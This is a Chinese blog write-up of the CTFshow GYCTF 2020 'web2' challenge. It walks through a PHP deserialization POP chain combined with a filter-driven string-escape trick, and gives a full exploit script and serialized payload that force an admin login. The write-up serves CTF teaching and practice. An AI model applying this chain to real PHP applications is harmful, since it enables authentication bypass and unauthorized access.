CTFSHOW game-gyctf web2

已于 2024-07-22 21:19:27 修改
阅读量753 收藏 17
点赞数 5
分类专栏: wp篇 文章标签: php
于 2024-07-22 21:18:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46203060/article/details/140619873
版权

【2020年新春战“疫”】game-gyctf web2

参考https://www.cnblogs.com/aninock/p/15408090.html
说明:看见网上好像没多少人写,刚好玩到这道题了,就写一下吧。

一、利用入口

常规套路发现www.zip然后进行代码审计
在这里插入图片描述index可以包含update,session[login]=1 ,才能获得flag在这里插入图片描述但要检查session
lib.php中设置了session,似乎只有用户admin
在这里插入图片描述可以看到User的验证只针对id和password
在这里插入图片描述所以,只要执行表查询select 1,“c4ca4238a0b923820dcc509a6f75849b” from user where username=?,并且设置name=admin。满足session_id=1,session_token=admin后,session[login]就等于1了,因此必须调用info中的login。

二、构造链条

备注:解析在注释

<?php

class User
{
    public $age = null;
    public $nickname = null;

    public function update()
    {
        $Info = unserialize($this->getNewinfo());
        $age = $Info->age;
        $nickname = $Info->nickname;
        $updateAction = new UpdateHelper($_SESSION['id'], $Info, "update user SET age=$age,nickname=$nickname where id=" . $_SESSION['id']);
        //这个功能还没有写完 先占坑
    }

    public function getNewInfo()
    {
        $age = $_POST['age'];
        $nickname = $_POST['nickname'];
        return serialize(new Info($age, $nickname));
    }

    public function __destruct()
    {
        return file_get_contents($this->nickname);//危
    }

    public function __toString()
    {
        $this->nickname->update($this->age);
        return "0-0";
    }
}

class Info
{
    public $age;
    public $nickname;
    public $CtrlCase;


    public function __call($name, $argument)
    {
        echo $this->CtrlCase->login($argument[0]);
    }
}

class UpdateHelper
{

    public $sql;

    public function __destruct()
    {
        echo $this->sql;
    }
}

class dbCtrl
{

    public $name;
    public $password;


    public function login($sql)
    {
        $this->mysqli = new mysqli($this->hostname, $this->dbuser, $this->dbpass, $this->database);
        if ($this->mysqli->connect_error) {
            die("连接失败,错误:" . $this->mysqli->connect_error);
        }
        $result = $this->mysqli->prepare($sql);
        $result->bind_param('s', $this->name);
        $result->execute();
        $result->bind_result($idResult, $passwordResult);
        $result->fetch();
        $result->close();
        if ($this->token == 'admin') {
            return $idResult;
        }
        if (!$idResult) {
            echo('用户不存在!');
            return false;
        }
        if (md5($this->password) !== $passwordResult) {
            echo('密码错误!');
            return false;
        }
        $_SESSION['token'] = $this->name;
        return $idResult;
    }
}

$users=new User();
$users->update();


#目标:调用info中的login,使其执行select 1,/"c4ca4238a0b923820dcc509a6f75849b/" from user where username=?
#$this->name = $_POST['username'];admin
#$this->password = $_POST['password'];1
#解决问题:判断以toString作为入口
$ud=new UpdateHelper();
$ud->sql=$users;#echo触发tostring

#第一步:另$age为需要执行的sql语句
$users->age="select 1,\"c4ca4238a0b923820dcc509a6f75849b\" from user where username=?";

#第二步:调用Info中的 login
$in=new Info();
$users->nickname=$in;#toString中的update(),Info类不存在从而触发call

#第三步:需要使用的是dbctrl中的login,继续构造链条
$db=new dbCtrl();
$db->name="admin";
$db->password="1";
$in->CtrlCase=$db;

echo serialize($ud);
#O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}

三、字符逃逸(增逃逸)

要从Info的login作为入口,而login(argument[0])是第二个参数,即nickname
注意:__call若传参,则返回不存在的方法名和该方法的参数。
在这里插入图片描述运行一下看看入口原来的输出
在这里插入图片描述O:4:“Info”:3:{s:3:“age”;s:6:“age123”;s:8:“nickname”;s:11:“nickname123”;s:8:“CtrlCase”;N;}
如果是load换成hacker,那么就从
O:4:“Info”:3:{s:3:“age”;s:6:“age123”;s:8:“nickname”;s:4:“load”;s:8:“CtrlCase”;N;}
变成
O:4:“Info”:3:{s:3:“age”;s:6:“age123”;s:8:“nickname”;s:4:“hacker”;s:8:“CtrlCase”;N;}
我需要逃逸274个字符串,那就是说要满足方程
6x=4x+274+闭合字符串(“;s:8:“CtrlCase”;)(17个)+最后的大括号(1个)
2x=292
x=146
所以需要146个"load”
在这里插入图片描述exp

……
echo serialize($ud);
echo "\n";
echo strlen(serialize($ud));
#O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}
echo "\n";

function safe($parm){
    $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter");
    return str_replace($array,'hacker',$parm);
}
$p=new Info();
$p->age="age123";
$m=str_repeat("load",146);
$p->nickname=$m."\";s:8:\"CtrlCase\";".serialize($ud).'}';
echo($p->nickname);
echo "\n";
echo safe(serialize($p));

四、使用Payload

提示10-0就成功调用__toString()了。
在这里插入图片描述在用admin/1登录既可以获得flag了。
在这里插入图片描述

这周末在做梦
关注
  • 5
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFshow_web2
zoixsoadji的博客
02-28 2223
进入题目,发现题目很简单,首先试试万能密码登陆。 登陆成功,接下来使用bp抓包,并且寻找注入点。 找到注入点,接下来看看它的2下面有什么 查到表名为web2的数据库,接下来继续注入,查询字段。 查找到了flag和user两个数据表,接下来查询字段 最后查询字段内容,得到flag 本人萌新,大佬手下留情 >_< ...
Game-EC辅助模块8.5.5[usb]贺岁版.rar
07-19
Game-EC辅助模块8.5.5[usb]贺岁版是一个专为游戏优化和管理设计的软件组件,主要用于提升游戏体验和性能。这个版本特别加入了USB支持,可能意味着它能够更好地识别和处理通过USB设备连接的游戏外设,如游戏手柄、...
ctfshow-WEB-web2
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可 在用户名的输入框中输入万能账号a' or true #,密码随便输 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库 首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输 a' union select 1,2...
ctfshow_WEB_web2 wp
Altering_Ji的博客
04-23 532
ctfshow WEB类题目web2,最简单的SQL注入,writeup
最新CTFShow web1-7——CTF秀WEB模块解题思路_ctfshow web题目解析
最新发布
2401_84264727的博客
05-04 795
这一关的重点在于注释, 由于开发人员的疏忽, 忘记删除注释中的敏感数据, 右键检查网页源码即可拿到 flag。
ctfshow web-2(sql注入)
m0_73303597的博客
11-21 1853
自用
ctfshow web2
m0_63253040的博客
03-12 1713
打开环境是一个登入页面, 题目提示:最简单的SQL注入,那么先试一试万能密码登入 ' or 1=1# 密码随便输 存在回显,直接sql注入 ' or 1=1 order by 3# 正常回显,爆到4时不回显 ' or 1=1 order by 4# 开始爆库名 ,先看看是哪个位置会回显 ' or 1=1 union select 1,2,3# 发现是可以不用输密码的 ' or 1=1 union select 1,database(),3# 得到库...
【安全攻防知识-8】CTF之web(2)
qq_26579613的博客
06-07 697
php反序列化讲解-入门
[GYCTF 2020] Web复现 wp
Alexhirchi的博客
07-30 1588
FlaskApp 要点:模板注入、Pin码 访问网站,提示了该网站由Flask框架搭建,进行简单测试,提供了base64加密和解密的功能,并开启了flask的dubug功能(输入错误的base64解码会出现报错界面) 猜测存在模板注入,构造payload:{{2+6}} base64加密,将结果进行解码,验证存在模板注入 构造payload获取python文件内容(通过之前的报错可以知道python文件名),循环查找catch_warnings,打开app.py读取内容 {% for c in []
CTFShow:萌新Web2
weixin_64089259的博客
04-14 259
比上一题多了一个过滤条件
GaMa-Game-Web-Manager
03-29
"GaMa-Game-Web-Manager" 是一个与游戏相关的Web管理工具,可能是用于协助管理和维护游戏网站或者在线游戏平台的。从标签"HTML"我们可以推测,这个工具可能涉及到前端开发,尤其是HTML语言的使用,这是一门用于构建...
layer-game-web
03-06
"layer-game-web"项目是一个基于JavaScript技术实现的分层游戏网页应用。在现代网页开发中,JavaScript扮演着至关重要的角色,特别是在创建交互性和动态性的Web内容方面。这个项目旨在为玩家提供一个多层次的游戏...
Game-EC.rar_Game-EC_dult.fne_ec game_ec模块驱动_game-ce模块下载
07-15
这是易语言的一个模块。 独立团模块8.1驱动版(Game-ec8.1)
Learning Cocos2d-JS game developing
01-18
学习cocos2d-js游戏开发,虽然cocos已经没落了, 但用这玩意儿开发个小游戏还是很6的.
wp篇 AWD某一赛题全流程复现【江西省高校网络安全技能大赛】
这周末在做梦的博客
11-06 4884
一,赛题概述 1概述 这道题目是PbootCMS V3.05,主页面如下。 2配置概述 采用tutum/lamp的镜像,Php 5.3+,其他扩展自行apt安装即可 3漏洞赛题 目前在dump下来的镜像中,发现存在且非CMS本身的官方预制漏洞有三,分别记录如下。 备注:在复现以下漏洞的时候,为了图一省事就赋予了所有文件777权限。 二,RCE 1赛题预制原理 (1)文件预制 .htaccess中 AddType application/x-httpd-php .sql php_value auto_ap
wp篇 adminlogin【第四届江西省高校网络安全技能大赛初赛】
这周末在做梦的博客
10-03 2426
这里写目录标题一,题目描述二,环境复现三,playload和exp四,学习与收获五,个人心得 一,题目描述 简而言之,附件中是一条连接,题目访问url/admin.php可以进入下图页面很明显,这是一道SQL注入。 二,环境复现 环境复现的附件我就放在,资源里面了,大家可以免费下载。 需要创建一个数据库ddctf(解释一下,我的英文ID是daydream,本人没有冒犯"DDCTF"的意思),然后引用source.sql。 admin.php也经过了测试,waf使用的是非完全版——即不一定完全与比赛当时的wa
wp 篇 DASCTF Thinkphp 3.2.3RCE复现
这周末在做梦的博客
08-09 1829
一,概述 在我开始这篇博客之前,请允许我说明一下"wp篇"存在的意义——它的存在主要是为了丰富我的“小破站”而存在的,你没听错,我还有一个小破站,如果你想要看看的话,可以私信我。(为什么不公开?因为,我并不是经常维护,而且里面放的题目都需要手动打开…总之就是怕麻烦)。 好了,接下来进入正题。首先给大家推荐这篇漏洞通报 ThinkPHP3.2.x RCE漏洞通报 。 其次,至于DASCTF这道easythinkphp,参加了比赛的都知道怎么回事了,没有参加的也没事,可以根据下面的阐述自己复现(大佬请勿入坑,不
dreamer-cms docker复现
这周末在做梦的博客
06-09 1034
dreamer-cms jar包docker复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

这周末在做梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值